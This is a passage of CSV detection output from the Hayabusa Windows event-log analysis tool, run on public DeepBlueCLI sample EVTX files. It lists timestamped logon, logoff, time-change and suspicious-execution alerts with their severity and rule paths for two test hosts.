.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: 
IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 
+09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 
+09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 
+09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 
+09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other 
File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 
08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 
00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target 
Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 